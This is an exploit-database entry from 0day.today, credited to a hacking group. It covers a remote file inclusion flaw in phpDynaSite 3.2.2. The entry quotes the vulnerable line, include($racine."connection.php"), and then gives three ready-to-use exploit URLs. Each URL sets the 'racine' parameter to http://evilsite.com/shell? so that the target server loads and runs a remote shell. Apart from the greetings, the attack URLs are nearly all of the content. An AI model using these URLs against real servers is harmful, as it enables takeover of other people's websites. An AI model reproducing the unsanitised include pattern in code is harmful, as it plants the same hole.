[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities

Author
DeltahackingTEAM
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1114
Category
web applications
Date add
04-11-2006
Platform
unsorted
=================================================================
phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities
=================================================================



**********************************************************************************************************
                                                    WwW.Deltahacking.NeT
                                                
**********************************************************************************************************

* dynasite3.2.2

* Class = Remote File Inclusion ;

* Found by = Dr.Pantagon 

-------------------------------------------------------------------------------------------------------------------


- Vulnerable Code

     include($racine."connection.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/function_log.php?racine=http://evilsite.com/shell?
    http://[target]/[path]/function_balise_url.php?racine=http://evilsite.com/shell?
    http://[target]/[path]/connection.php?racine=http://evilsite.com/shell?


------------------------------------------------------------------------------------------------------------------

Gr33tz:  Dr.Torojan

**************************************************************************************************************


#  0day.today [2024-12-24]  #